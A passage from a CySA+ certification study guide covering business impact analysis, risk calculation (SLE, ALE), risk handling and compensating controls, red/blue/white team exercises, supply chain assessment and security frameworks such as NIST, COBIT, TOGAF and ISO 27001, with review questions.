risk assessment may be performed by the Business
Continuity Planning (BCP) committee or by a separately
appointed risk assessment team.
Identify Critical Processes and Resources
When identifying the critical processes and resources of an
organization, the BCP committee must first identify all the
business units or functional areas within the organization. After
all units have been identified, the BCP team should select the individuals who will be responsible for gathering all the needed data and decide how to obtain that data. These individuals will gather
the data using a variety of techniques, including questionnaires,
interviews, and surveys. They might also actually perform a
vulnerability analysis and risk assessment or use the results of
these tests as input for the BIA. During the data gathering, the
organization’s business processes and functions and the
resources upon which these processes and functions depend
should be documented. This list should include all business
assets, including physical and financial assets that are owned by
the organization, and any assets that provide competitive
advantage or credibility.
After determining all the business processes, functions, and
resources, the organization should then determine the criticality
level of each process, function, and resource. This is done by
analyzing the impact that the loss of each resource would
impose on the capability to continue to do business.
Identify Outage Impacts and Estimate Downtime
Analyzing the impact that the loss of each resource would
impose on the ability to continue to do business will provide the
raw material to generate metrics used to determine the extent to
which redundancy must be provided to each resource. You
learned about metrics such as MTD, MTTR, and RTO that are
used to assess downtime and recovery time in Chapter 16,
“Applying the Appropriate Incident Response Procedure.”
Please review those concepts.
Identify Resource Requirements
After the criticality level of each process, function, and resource
is determined, you need to determine all the resource
requirements for each process, function, and resource. For
example, an organization’s accounting system might rely on a
server that stores the accounting application, another server
that holds the database, various client systems that perform the
accounting tasks over the network, and the network devices and
infrastructure that support the system. Resource requirements
should also consider any human resources requirements. When
human resources are unavailable, the organization can be just
as negatively impacted as when technological resources are
unavailable.
Note
Keep in mind that the priority for any CySA professional should be the safety of
human life. Consider and protect all other organizational resources only after
personnel are safe.
The organization must document the resource requirements for
every resource that would need to be restored when the
disruptive event occurs. This includes device name, operating
system or platform version, hardware requirements, and device
interrelationships.
Identify Recovery Priorities
After all the resource requirements have been identified, the
organization must identify the recovery priorities. Establish
recovery priorities by taking into consideration process
criticality, outage impacts, tolerable downtime, and system
resources. After all this information is compiled, the result is an
information system recovery priority hierarchy.
Three main levels of recovery priorities should be used: high,
medium, and low. The BIA stipulates the recovery priorities but
does not provide the recovery solutions. Those are given in the
disaster recovery plan (DRP).
Recoverability
Recoverability is the ability of a function or system to be
recovered in the event of a disaster or disruptive event. As part
of recoverability, downtime must be minimized. Recoverability
places emphasis on the personnel and resources used for
recovery.
Fault Tolerance
Fault tolerance is provided when a backup component begins
operation when the primary component fails. One of the key
aspects of fault tolerance is the lack of service interruption.
Varying levels of fault tolerance can be achieved at most levels
of the organization based on how much an organization is
willing to spend. However, the backup component often does
not provide the same level of service as the primary component.
For example, an organization might implement a high-speed
OC1 connection to the Internet. However, the backup
connection to the Internet that is used in the event of the failure
of the OC1 line might be much slower but at a much lower cost
of implementation than the primary OC1 connection.
RISK IDENTIFICATION PROCESS
A risk assessment is a tool used in risk management to
identify vulnerabilities and threats, assess the impact of those
vulnerabilities and threats, and determine which controls to
implement. This is also called risk identification. Risk
assessment (or analysis) has four main goals:
Identify assets and asset value.
Identify vulnerabilities and threats.
Calculate threat probability and business impact.
Balance threat impact with countermeasure cost.
Prior to starting a risk assessment, management and the risk
assessment team must determine which assets and threats to
consider. This process determines the size of the project. The
risk assessment team must then provide a report to
management on the value of the assets considered.
Management can then review and finalize the asset list, adding
and removing assets as it sees fit, and then determine the
budget of the risk assessment project.
Let’s look at a specific scenario to help understand the
importance of system-specific risk analysis. In our scenario, the
Sales division decides to implement touchscreen technology and
tablet computers to increase productivity. As part of this new
effort, a new sales application will be developed that works with
the new technology. At the beginning of the deployment, the
chief security officer (CSO) attempts to prevent the deployment
because the technology is not supported in the enterprise.
Upper management decides to allow the deployment. The CSO
should work with the Sales division and other areas involved so
that the risk associated with the full life cycle of the new
deployment can be fully documented and appropriate controls
and strategies can be implemented during deployment.
Risk assessment should be carried out before any mergers and
acquisitions occur or new technology and applications are
deployed. If a risk assessment is not supported and directed by
senior management, it will not be successful. Management must
define the purpose and scope of a risk assessment and allocate
the personnel, time, and monetary resources for the project.
There are several approaches to performing a risk assessment,
covered in the following sections.
Make Risk Determination Based upon Known Metrics
To make a risk determination, an organization must perform a
formal risk analysis. A formal risk analysis often asks questions
such as these: What corporate assets need to be protected?
What are the business needs of the organization? What outside
threats are most likely to compromise network security?
Different types of risk analysis, including qualitative risk
analysis and quantitative risk analysis, should be used to ensure
that the data obtained is maximized.
Qualitative Risk Analysis
A qualitative risk analysis does not assign monetary and
numeric values to all facets of the risk analysis process.
Qualitative risk analysis techniques include intuition,
experience, and best practice techniques, such as
brainstorming, focus groups, surveys, questionnaires, meetings,
interviews, and Delphi. The Delphi technique is a method used
to estimate the likelihood and outcome of future events.
Although all these techniques can be used, most organizations
will determine the best technique(s) based on the threats to be
assessed. Conducting a qualitative risk analysis requires a risk
assessment team that has experience and education related to
assessing threats.
Each member of the group who has been chosen to participate
in the qualitative risk analysis uses his or her experience to rank
the likelihood of each threat and the damage that might result.
After each group member ranks the threat possibility, loss
potential, and safeguard advantage, data is combined in a report
to present to management.
Two advantages of qualitative over quantitative risk analysis
(discussed next) are that qualitative prioritizes the risks and
identifies areas for immediate improvement in addressing the
threats. Disadvantages of qualitative risk analysis are that all
results are subjective and a dollar value is not provided for
cost/benefit analysis or for budget help.
Note
When performing risk analyses, all organizations experience issues with any
estimate they obtain. This lack of confidence in an estimate is referred to as
uncertainty and is expressed as a percentage. Any reports regarding a risk
assessment should include the uncertainty level.
Quantitative Risk Analysis
A quantitative risk analysis assigns monetary and numeric
values to all facets of the risk analysis process, including asset
value, threat frequency, vulnerability severity, impact, and
safeguard costs. Equations are used to determine total and
residual risks. An advantage of quantitative over qualitative risk
analysis is that quantitative uses less guesswork than
qualitative. Disadvantages of quantitative risk analysis include
the difficulty of the equations, the time and effort needed to
complete the analysis, and the level of data that must be
gathered for the analysis.
Most risk analyses include some hybrid of both quantitative and qualitative risk analysis. Most organizations favor using
quantitative risk analysis for tangible assets and qualitative risk
analysis for intangible assets. Keep in mind that even though
quantitative risk analysis uses numeric values, a purely
quantitative analysis cannot be achieved because some level of
subjectivity is always part of the data. This type of estimate
should be based on historical data, industry experience, and
expert opinion.
RISK CALCULATION
A quantitative risk analysis assigns monetary and numeric
values to all facets of the risk analysis process, including asset
value, threat frequency, vulnerability severity, impact, safeguard
costs, and so on. Equations are used to determine total and
residual risks. The most common equations are for single loss
expectancy and annual loss expectancy.
The single loss expectancy (SLE) is the monetary impact of
each threat occurrence. To determine the SLE, you must know
the asset value (AV) and the exposure factor (EF), which
is the percentage value or functionality of an asset that will be
lost when a threat event occurs. The calculation for obtaining
the SLE is as follows:
SLE = AV × EF
For example, an organization has a web server farm with an AV
of $20,000. If the risk assessment has determined that a power
failure is a threat agent for the web server farm and the EF for a
power failure is 25%, the SLE for this event equals $5000.
The annual loss expectancy (ALE) is the expected risk
factor of an annual threat event. To determine the ALE, you
must know the SLE and the annualized rate of occurrence
(ARO), which is the estimate of how often a given threat might
occur annually. The calculation for obtaining the ALE is as
follows:
ALE = SLE × ARO
Using the previously mentioned example, if the risk assessment
has determined that the ARO for the power failure of the web
server farm is 50%, the ALE for this event equals $2500.
Security professionals should keep in mind that this calculation
can be adjusted for geographic distances.
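These two formulas are easy to verify in code. The short Python sketch below reproduces the chapter's web server farm example and previews the control cost comparison discussed next; the control cost figure is hypothetical.

def single_loss_expectancy(av, ef):
    """SLE = AV x EF."""
    return av * ef

def annual_loss_expectancy(sle, aro):
    """ALE = SLE x ARO."""
    return sle * aro

sle = single_loss_expectancy(20000, 0.25)   # $5,000 per power failure event
ale = annual_loss_expectancy(sle, 0.5)      # $2,500 expected loss per year
print(sle, ale)

annual_control_cost = 3000                  # hypothetical annual cost of the control
print("consider the control" if annual_control_cost < ale else "consider accepting the risk")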
Using the ALE, the organization can decide whether to
implement controls or not. If the annual cost of the control to
protect the web server farm is more than the ALE, the
organization could easily choose to accept the risk by not
implementing the control. If the annual cost of the control to
protect the web server farm is less than the ALE, the
organization should consider implementing the control.
As previously mentioned, even though quantitative risk analysis
uses numeric value, a purely quantitative analysis cannot be
achieved because some level of subjectivity is always part of the
data. In the previous example, how does the organization know
that damage from the power failure will be 25% of the asset?
This type of estimate should be based on historical data,
industry experience, and expert opinion.
Probability
Both qualitative and quantitative risk analysis processes take
into consideration the probability that an event will occur. In
quantitative risk analysis, this consideration is made using the
ARO value for each event. In qualitative risk assessment, each
possible event is assigned a probability value by subject matter
experts.
Magnitude
Both qualitative and quantitative risk analysis processes take
into consideration the magnitude of an event that might occur.
In quantitative risk analysis, this consideration is made using
the SLE and ALE values for each event. In qualitative risk
assessment, each possible event is assigned an impact
(magnitude) value by subject matter experts.
COMMUNICATION OF RISK FACTORS
Technical cybersecurity risks represent a threat that is largely
misunderstood by non-technical personnel. Security
professionals must bridge the knowledge gap in a manner that
the stakeholders understand. To properly communicate
technical risks, security professionals must first understand
their audience and then be able to translate those risks into
business terms that the audience understands.
The audience that needs to understand the technical risks
includes semi-technical audiences, non-technical leadership, the board of directors and executives, and regulators. The semi-technical audience understands the security operations
difficulties and often consists of powerful allies. Typically, this
audience needs a data-driven, high-level message based on
verifiable facts and trends. The non-technical leadership
audience needs the message to be put in context with their
responsibilities. This audience needs the cost of cybersecurity
expenditures to be tied to business performance. Security
professionals should present metrics that show how cyber risk is
trending, without using popular jargon. The board of directors
and executives are primarily concerned with business risk
management and managing return on assets. The message to
this group should translate technical risk into common business
terms and present metrics about cybersecurity risk and
performance.
Finally, when communicating with regulators, it is important to
be thorough and transparent. In addition, organizations may
want to engage a third party to do a gap assessment before an
audit. This helps security professionals find and remediate
weaknesses prior to the audit and enables the third party to
speak on behalf of the security program.
To frame the technical risks into business terms for these
audiences, security professionals should focus on business
disruption, regulatory issues, and bad press. If a company’s
database is attacked and, as a result, the website cannot sell
products to customers, this is a significant disruption of
business operations. If an incident occurs that results in a
regulatory investigation and fines, a regulatory issue has arisen.
Bad press can result in lost sales and costs to repair the
organization’s image.
Security professionals must understand the risk metrics and
what each metric costs the organization. Although security
professionals may not definitively know the return on
investment (ROI), they should take the security incident
frequency at the organization and assign costs in terms of risk
exposure for every risk. It is also helpful to match the risks with
the assets protected to make sure the organization’s investment
is protecting the most valuable assets.
Moreover, security professionals alone cannot best determine
the confidentiality, integrity, and availability (CIA) levels for
enterprise information assets. Security professionals should
consult with the asset stakeholders to gain their input on which
level should be assigned to each tenet for an information asset.
Keep in mind, however, that all stakeholders should be
consulted. For example, while department heads should be
consulted and have the biggest influence on the CIA decisions
about departmental assets, other stakeholders within the
department and organization should be consulted as well.
This rule holds for any security project that an enterprise
undertakes. Stakeholder input should be critical at the start of
the project to ensure that stakeholder needs are documented
and to gain stakeholder project buy-in. Later, if problems arise
with the security project and changes must be made, the project
team should discuss the potential changes with the project
stakeholders before any project changes are approved or
implemented.
RISK PRIORITIZATION
As previously discussed, by using either quantitative or
qualitative analysis, you can arrive at a priority list that
indicates which issues need to be treated sooner rather than
later and which can wait. In qualitative analysis, one method
used is called a risk assessment matrix. When a qualitative
assessment is conducted, the risks are placed into the following
categories:
High
Medium
Low
Then, a risk assessment matrix, such as the one in Figure 20-1, is created. Subject matter experts grade all risks based on their likelihood and impact. This helps prioritize the application of resources to the most critical vulnerabilities.
Figure 20-1 Risk Assessment Matrix
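A qualitative matrix can be represented as a simple lookup from likelihood and impact grades to a priority, as in the Python sketch below; the grading in this grid is illustrative and does not reproduce Figure 20-1 exactly.

RISK_MATRIX = {
    ("low", "low"): "low",       ("low", "medium"): "low",        ("low", "high"): "medium",
    ("medium", "low"): "low",    ("medium", "medium"): "medium",  ("medium", "high"): "high",
    ("high", "low"): "medium",   ("high", "medium"): "high",      ("high", "high"): "high",
}

def prioritize(likelihood, impact):
    """Return the priority the matrix assigns to a graded risk."""
    return RISK_MATRIX[(likelihood, impact)]

print(prioritize("high", "medium"))  # "high": treat sooner rather than later
print(prioritize("low", "medium"))   # "low": can wait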
Security Controls
Chapter 21, “The Importance of Frameworks, Policies,
Procedures, and Controls,” delves deeply into the types of
controls that can be implemented to address security issues.
The selection of controls that are both cost effective and capable of addressing the issue depends in large part on how an organization chooses to address or handle risk. The following four basic methods are used to handle risk:
Risk avoidance: Terminating the activity that causes a risk or
choosing an alternative that is not as risky
Risk transfer: Passing on the risk to a third party, such as an
insurance company
Risk mitigation: Defining the acceptable risk level the
organization can tolerate and reducing the risk to that level
Risk acceptance: Understanding and accepting the level of risk
as well as the cost of damages that can occur
Engineering Tradeoffs
In some cases, there may be issues that make implementing a
particular solution inadvisable or impossible. Engineering
tradeoffs are inhibitors to remediation and are covered in the
following sections.
MOUs
A memorandum of understanding (MOU) is a document
that, while not legally binding, indicates a general agreement
between the principals to do something together. An
organization may have MOUs with multiple organizations, and
MOUs may in some instances contain security requirements
that inhibit or prevent the deployment of certain measures.
SLAs
A service-level agreement (SLA) is a document that
specifies a service to be provided by a party, the costs of the
service, and the expectations of performance. These contracts
may exist with third parties from outside the organization and
between departments within an organization. Sometimes these
SLAs may include specifications that inhibit or prevent the
deployment of certain measures.
Organizational Governance
Organizational governance refers to the process of
controlling an organization’s activities, processes, and
operations. When the process is unwieldy, as it is in some very
large organizations, the application of countermeasures may be
frustratingly slow. One of the reasons for including upper
management in the entire process is to use the weight of
authority to cut through the red tape.
Business Process Interruption
The deployment of mitigations cannot be done in such a way
that business operations and processes are interrupted.
Therefore, the need to conduct these activities during off hours
can also be a factor that impedes the remediation of
vulnerabilities.
Degrading Functionality
Finally, some solutions create more issues than they resolve. In
some cases, it may be impossible to implement mitigation due
to the fact that it breaks mission-critical applications or
processes. The organization may need to research an alternative
solution.
SYSTEMS ASSESSMENT
Systems assessment comprises a process whereby systems
are fully vetted for potential issues from both a functionality
standpoint and a security standpoint. These assessments
(discussed more fully in Chapter 21) can lead to two types of
organizational approvals: accreditation and certification.
Although the terms are used as synonyms in casual
conversation, accreditation and certification are two different
concepts in the context of assurance levels and ratings.
However, they are closely related. Certification evaluates the
technical system components, whereas accreditation occurs
when the adequacy of a system’s overall security is accepted by
management.
ISO/IEC 27001
ISO/IEC 27001:2013 is the current version of the 27001
standard, and it is one of the most popular standards by which
organizations obtain certification for information security. It
provides guidance on ensuring that an organization’s
information security management system (ISMS) is properly
established, implemented, maintained, and continually
improved. It includes the following components:
ISMS scope
Information security policy
Risk assessment process and its results
Risk treatment process and its decisions
Information security objectives
Information security personnel competence
Necessary ISMS-related documents
Operational planning and control document
Information security monitoring and measurement evidence
ISMS internal audit program and its results
Top management ISMS review evidence
Evidence of identified nonconformities and corrective actions
When an organization decides to obtain ISO/IEC 27001
certification, a project manager should be selected to ensure
that all the components are properly completed.
To implement ISO/IEC 27001:2013, the project manager should
complete the following steps:
Step 1. Obtain management support.
Step 2. Determine whether to use consultants or to complete
the work in-house, purchase the 27001 standard, write
the project plan, define the stakeholders, and organize
the project kickoff.
Step 3. Identify the requirements.
Step 4. Define the ISMS scope, information security policy,
and information security objectives.
Step 5. Develop document control, internal audit, and
corrective action procedures.
Step 6. Perform risk assessment and risk treatment.
Step 7. Develop a statement of applicability and a risk
treatment plan and accept all residual risks.
Step 8. Implement the controls defined in the risk treatment
plan and maintain the implementation records.
Step 9. Develop and implement security training and
awareness programs.
Step 10. Implement the ISMS, maintain policies and
procedures, and perform corrective actions.
Step 11. Maintain and monitor the ISMS.
Step 12. Perform an internal audit and write an audit report.
Step 13. Perform management review and maintain
management review records.
Step 14. Select a certification body and complete
certification.
Step 15. Maintain records for surveillance visits.
For more information, visit
https://www.iso.org/standard/54534.html.
ISO/IEC 27002
ISO/IEC 27002:2013 is the current version of the 27002
standard, and it provides a code of practice for information
security management. It includes the following 14 content
areas:
Information security policy
Organization of information security
Human resources security
Asset management
Access control
Cryptography
Physical and environmental security
Operations security
Communications security
Information systems acquisition, development, and maintenance
Supplier relationships
Information security incident management
Information security aspects of business continuity
Compliance
For more information, visit
https://www.iso.org/standard/54533.html.
DOCUMENTED COMPENSATING
CONTROLS
As pointed out in the section “Engineering Tradeoffs” earlier in
this chapter, in some cases, there may be issues that make
implementing a particular solution inadvisable or impossible.
Not all weaknesses can be eliminated. In some cases, they can
only be mitigated. This can be done by implementing controls
that compensate for a weakness that cannot be completely
eliminated. A compensating control reduces the potential risk.
Compensating controls are also referred to as countermeasures
and safeguards. Three things must be considered when
implementing a compensating control: vulnerability, threat, and
risk. For example, a good countermeasure might be to
implement the appropriate ACL and encrypt the data. The ACL
protects the integrity of the data, and the encryption protects
the confidentiality of the data.
Compensating controls are put in place to substitute for a
primary access control and mainly act to mitigate risks. By
using compensating controls, you can reduce risk to a more
manageable level. Examples of compensating controls include
requiring two authorized signatures to release sensitive or
confidential information and requiring two keys owned by
different personnel to open a safety deposit box. These
compensating controls must be recorded along with the reason
the primary control was not implemented. Compensating
controls are covered further in Chapter 21.
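Because compensating controls must be recorded along with the reason the primary control was not implemented, a simple structured record helps. The Python sketch below shows one possible in-house format; the field names and values are hypothetical.

from dataclasses import dataclass, asdict

@dataclass
class CompensatingControlRecord:
    weakness: str
    primary_control: str
    reason_not_implemented: str
    compensating_control: str

record = CompensatingControlRecord(
    weakness="Legacy application cannot enforce per-user logins",
    primary_control="Unique user authentication",
    reason_not_implemented="Control breaks a mission-critical application",
    compensating_control="Restrictive ACL on the data store plus encryption at rest",
)
print(asdict(record))  # store alongside other risk documentation for audit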
TRAINING AND EXERCISES
Security analysts must practice responding to security events in
order to react to them in the most organized and efficient
manner. There are some well-established ways to approach this.
This section looks at how teams of analysts, both employees and third-party contractors, can be organized, and it covers some well-established names for these teams. Security posture is typically
assessed by war game exercises in which one group attacks the
network while another attempts to defend the network. These
games typically have some implementation of the following
teams.
Red Team
The red team acts as the attacking force. It typically carries out
penetration tests by following a well-established process of
gathering information about the network, scanning the network
for vulnerabilities, and then attempting to take advantage of the
vulnerabilities. The actions they can take are established ahead
of time in the rules of engagement. Often these individuals are
third-party contractors with no prior knowledge of the network.
This helps them simulate attacks that are not inside jobs.
Blue Team
The blue team acts as the network defense team, and the
attempted attack by the red team tests the blue team’s ability to
respond to the attack. It also serves as practice for a real attack.
This includes accessing log data, using a SIEM, garnering
intelligence information, and performing traffic and data flow
analysis.
White Team
The white team is a group of technicians who referee the
encounter between the red team and the blue team. Enforcing
the rules of engagement might be one of the white team’s roles,
along with monitoring the responses to the attack by the blue
team and making note of specific approaches employed by the
red team.
Tabletop Exercise
Conducting a tabletop exercise is the most cost-effective and
efficient way to identify areas of vulnerability before moving on
to higher-level testing. A tabletop exercise is an informal
brainstorming session that encourages participation from
business leaders and other key employees. In a tabletop
exercise, the participants agree on a particular attack scenario upon which they then focus.
SUPPLY CHAIN ASSESSMENT
Organizational risk mitigation requires assessing the safety and
the integrity of the hardware and software before the
organization purchases it. The following are some of the
methods used to assess the supply chain through which a
hardware or software product flows to ensure that the product
does not pose a security risk to the organization.
Vendor Due Diligence
Performing due diligence with regard to a vendor means assessing the vendor's products and services. While we are certainly concerned with the functionality and value of the products, we are even more concerned about their innate security.
Stories about counterfeit gear that contains backdoors have
circulated for years and are not unfounded. Online resources for conducting due diligence about vendors include https://complyadvantage.com/knowledgebase/vendor-due-diligence/.
OEM Documentation
One of the ways you can reduce the likelihood of purchasing
counterfeit equipment is to insist on the inclusion of verifiable
original equipment manufacturer (OEM) documentation. In
many cases, this paperwork includes anti-counterfeiting
features. Make sure to use the vendor website to verify all the
various identifying numbers in the documentation.
Hardware Source Authenticity
When purchasing hardware to support any network or security
solution, a security professional must ensure that the
hardware’s authenticity can be verified. Just as expensive
consumer items such as purses and watches can be
counterfeited, so can network equipment. Whereas the dangers
with counterfeit consumer items are typically confined to a lack
of authenticity and potentially lower quality, the dangers
presented by counterfeit network gear can extend to the
presence of backdoors in the software or firmware. Always
purchase equipment directly from the manufacturer when
possible, and when purchasing from resellers, use caution and
insist on a certificate of authenticity. In any case where the price
seems too good to be true, keep in mind that it may be an
indication the gear is not authentic.
Trusted Foundry
The Trusted Foundry program can help you exercise care
in ensuring the authenticity and integrity of the components of
hardware purchased from a vendor. This DoD program
identifies “trusted vendors” and ensures a “trusted supply
chain.” A trusted supply chain begins with trusted design and
continues with trusted mask, foundry, packaging/assembly, and
test services. It ensures that systems have access to leading-edge
integrated circuits from secure, domestic sources. At the time of
this writing, 77 vendors have been certified as trusted.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 20-2
lists a reference of these key topics and the page numbers on
which each is found.
Table 20-2 Key Topics in Chapter 20
Key Topic Element | Description | Page Number
Bulleted list | Main steps of the BIA | 530
Bulleted list | Risk assessment goals | 532
Section | Quantitative risk analysis | 534
Figure 20-1 | Risk assessment matrix | 537
Bulleted list | Methods used to handle risk | 538
Step list | Implementing ISO/IEC 27001:2013 | 540
Sections | Testing teams | 542
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
business impact analysis (BIA)
Business Continuity Planning (BCP) committee
recoverability
fault tolerance
risk assessment
qualitative risk analysis
quantitative risk analysis
single loss expectancy (SLE)
annual loss expectancy (ALE)
asset value (AV)
exposure factor (EF)
annualized rate of occurrence (ARO)
risk assessment matrix
risk avoidance
risk transfer
risk mitigation
risk acceptance
memorandum of understanding (MOU)
service-level agreement (SLA)
organizational governance
systems assessment
ISO/IEC 27001:2013
ISO/IEC 27002:2013
red team
blue team
white team
tabletop exercise
Trusted Foundry program
REVIEW QUESTIONS
1. The vulnerability analysis and risk assessment may be
performed by the __________________ or by a
separately appointed risk assessment team.
2. List the four main steps of the BIA in order.
3. Match the following terms with their definitions.
Terms | Definitions
BIA | Acts as the attacking force during testing
Red team | Lists the critical and necessary business functions, their resource dependencies, and their level of criticality to the overall organization
Blue team | Group of technicians who referee the encounter during testing
White team | Acts as the network defense team during testing
4. ____________________ assigns monetary and numeric
values to all facets of the risk analysis process, including
asset value, threat frequency, vulnerability severity, impact,
and safeguard costs.
5. An organization has a web server farm with an AV of
$20,000. If the risk assessment has determined that a power
failure is a threat agent for the web server farm and the EF
for a power failure is 25%, the SLE for this event equals
$_____________.
6. Match the following terms with their definitions.
Terms | Definitions
Tabletop exercise | Performs vulnerability analysis and risk assessment
Business Continuity Planning (BCP) committee | Process of controlling an organization’s activities, processes, and operations
Organizational governance | An informal brainstorming session that encourages participation from business leaders and other key employees
7. The _______________________ helps prioritize the
application of resources to the most critical vulnerabilities
during qualitative risk assessment.
8. List and define at least two ways to handle risk.
9. Match the following terms with their definitions.
Terms | Definitions
MOU | Document that specifies a service to be provided by a party
SLA | Performs vulnerability analysis and risk assessment
BCP | Functional analysis that occurs as part of business continuity and disaster recovery
BIA | Document that, while not legally binding, indicates a general agreement between the principals to do something together
10. ALE = ________________
Chapter 21
The Importance of
Frameworks, Policies,
Procedures, and Controls
This chapter covers the following topics related to Objective 5.3
(Explain the importance of frameworks, policies, procedures, and
controls) of the CompTIA Cybersecurity Analyst (CySA+) CS0-002
certification exam:
Frameworks: Covers both risk-based and prescriptive
frameworks.
Policies and procedures: Includes code of conduct/ethics,
acceptable use policy (AUP), password policy, data ownership, data
retention, account management, continuous monitoring, and work
product retention.
Category: Describes the managerial, operational, and technical
categories.
Control type: Covers the preventative, detective, corrective,
deterrent, compensating, and physical control types.
Audits and assessments: Discusses regulatory and compliance
audits.
Organizations use policies, procedures, and controls to
implement security. Policies are broad statements that define
what the aim of the security measure is, while procedures define
how to carry out the measures. Controls are countermeasures or
mitigations that are used to prevent breaches. Creating and
implementing policies, procedures, and controls can be a
challenge. Help is available, however, from security frameworks
created by various entities. Help is available through templates,
examples, and other documents that organizations can use to
ensure that they have covered all bases. This chapter explains
what policies, procedures, and controls are and describes how
security frameworks can be used to create them.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these ten self-assessment questions, you might
want to move ahead to the “Exam Preparation Tasks” section.
Table 21-1 lists the major headings in this chapter and the “Do I Know
This Already?” quiz questions covering the material in those
headings so you can assess your knowledge of these specific
areas. The answers to the “Do I Know This Already?” quiz
appear in Appendix A.
Table 21-1 “Do I Know This Already?” Foundation Topics Section-to-Question Mapping
Foundation Topics Section | Questions
Frameworks | 1, 2
Policies and Procedures | 3, 4
Category | 9, 10
Control Type | 5, 6
Audits and Assessments | 7, 8
1. Which of the following is not one of the four interrelated
domains of The Open Group Architecture Framework
(TOGAF)?
1. Business architecture
2. Data architecture
3. Security architecture
4. Technology architecture
2. Which of the following is not one of the classes of controls
described by NIST SP 800-53 Rev 4?
1. Access Control
2. Awareness and Training
3. Contingency Planning
4. Facility Security
3. Which of the following policies is intended to demonstrate a
commitment to ethics?
1. Non-compete
2. Non-disclosure
3. Expectation of privacy
4. Code of conduct
4. Which of the following consists of single words that often
include a mixture of upper- and lowercase letters?
1. Standard word passwords
2. Complex passwords
3. Passphrase passwords
4. Cognitive passwords
5. Which of the following controls are implemented to
administer the organization’s assets and personnel and
include security policies, procedures, standards, baselines,
and guidelines that are established by management?
1. Managerial
2. Physical
3. Technical
4. Logical
6. Which operational control type would include security
guards?
1. Detective
2. Preventative
3. Deterrent
4. Directive
7. Which of the following reports focuses on internal controls
over financial reporting?
1. SOC 1
2. SOC 2
3. SOC 3
4. SOC 4
8. Which of the following standards verifies the controls and
processes and requires a written assertion regarding the
design and operating effectiveness of the controls being
reviewed?
1. SSAE 16
2. HIPAA
3. GLBA
4. CFAA
9. When you implement a new password policy, what category
of control have you implemented?
1. Managerial
2. Operational
3. Technical
4. Preventative
10. Which of the following controls is a directive control?
1. A new firewall
2. A policy forbidding USB drives
3. A No Admittance sign at the server room door
4. A biometric authentication system
FOUNDATION TOPICS
FRAMEWORKS
Many organizations have developed security management
frameworks and methodologies to help guide security
professionals. These frameworks and methodologies include
security program development standards, enterprise and
security architect development frameworks, security control
development methods, corporate governance methods, and
process management methods. The following sections discuss
the major frameworks and methodologies and explain where
they are used.
Risk-Based Frameworks
Some frameworks are designed to help organizations organize
their approach and response to risk. Frameworks in this section
are risk-based.
National Institute of Standards and Technology (NIST)
NIST SP 800-53 Rev 4 is a security controls development
framework developed by the NIST body of the U.S. Department
of Commerce. Table 21-2 lists the NIST SP 800-53 Rev 4
control families.
Table 21-2 NIST SP 800-53 Rev 4 Control Families
Family
Access Control
Audit and Accountability
Awareness and Training
Security Assessment and Authorization
Configuration Management
Contingency Planning
Incident Response
Maintenance
Media Protection
Personnel Security
Physical and Environmental Protection
Planning
Risk Assessment
System and Communications Protection
System and Information Integrity
System and Services Acquisition
NIST SP 800-55 Rev 1 is an information security metrics
framework that provides guidance on developing performance
measuring procedures with a U.S. government viewpoint.
COBIT
The governance and management objectives in COBIT 2019 are
grouped into five domains. The domains have names with verbs
that express the key purpose and areas of activity of the
objectives contained in them. The five domains are
Evaluate, Direct, and Monitor (EDM)
Align, Plan, and Organize (APO)
Build, Acquire, and Implement (BAI)
Deliver, Service, and Support (DSS)
Monitor, Evaluate, and Assess (MEA)
The COBIT 2019 Goals Cascade (shown in Figure 21-1) supports
translation of enterprise goals into priorities for alignment
goals.
Figure 21-1 The COBIT 2019 Goals Cascade
The Open Group Architecture Framework (TOGAF)
The Open Group Architecture Framework (TOGAF),
another enterprise architecture framework, helps organizations
design, plan, implement, and govern an enterprise information
architecture. The latest version, TOGAF 9.2, was launched in
2018. TOGAF is based on
Business architecture: Business strategy, governance,
organization, and key business processes
Application architecture: Individual systems to be deployed,
interactions between the application systems, and their
relationships to the core business processes
Data architecture: Structure of an organization’s logical and
physical data assets
Technology architecture: Hardware, software, and network
infrastructure
The Architecture Development Method (ADM), as prescribed by
TOGAF, is applied to develop an enterprise architecture that
meets the business and information technology needs of an
organization. Figure 21-2 shows the process, which is iterative
and cyclic. Each phase is checked against the requirements.
Figure 21-2 TOGAF ADM Model
Prescriptive Frameworks
Some frameworks are designed to provide organizations with a
list of activities that comprise a prescription for handling
certain security issues common to all. The frameworks
described in this section are prescriptive.
NIST Cybersecurity Framework Version 1.1
NIST created the Framework for Improving Critical
Infrastructure Cybersecurity, or simply the NIST
Cybersecurity Framework version 1.1, in 2018. It focuses
exclusively on IT security and is composed of three parts:
Framework Core: The core presents five cybersecurity functions,
each of which is further divided into categories and subcategories. It
describes desired outcomes for these functions. As you can see in
Figure 21-3, each function has informative references available to
help guide the completion of that subcategory of a particular
function.
Figure 21-3 Framework Core Structure
Implementation Tiers: These tiers are levels of sophistication in
the risk management process that organizations can aspire to reach.
These tiers can be used as milestones in the development of an
organization’s risk management process. The four tiers, from least
developed to most developed, are Partial, Risk Informed,
Repeatable, and Adaptive.
Framework Profiles: Profiles can be used to compare the current
state (or profile) to a target state (profile). This enables an
organization to create an action plan to close gaps between the two.
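To illustrate the gap analysis a profile comparison enables, the following Python sketch compares invented tier values for a few subcategories; real profiles map desired outcomes across all of the framework's categories and subcategories.

# Invented subcategory tiers for illustration (1 = Partial ... 4 = Adaptive).
current_profile = {"ID.AM-1": 2, "PR.AC-1": 1, "DE.CM-1": 2}
target_profile = {"ID.AM-1": 3, "PR.AC-1": 3, "DE.CM-1": 2}

# A gap exists wherever the target tier exceeds the current tier.
gaps = {name: target_profile[name] - current_profile.get(name, 0)
        for name in target_profile
        if target_profile[name] > current_profile.get(name, 0)}

for subcategory, gap in sorted(gaps.items(), key=lambda item: -item[1]):
    print(f"{subcategory}: raise maturity by {gap} tier(s)")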
ISO 27000 Series
The International Organization for Standardization (ISO), often
incorrectly referred to as the International Standards
Organization, joined with the International Electrotechnical
Commission (IEC) to standardize the British Standard 7799
(BS7799) to a new global standard that is now referred to as the
ISO/IEC 27000 Series. ISO/IEC 27000 is a security program
development standard on how to develop and maintain an
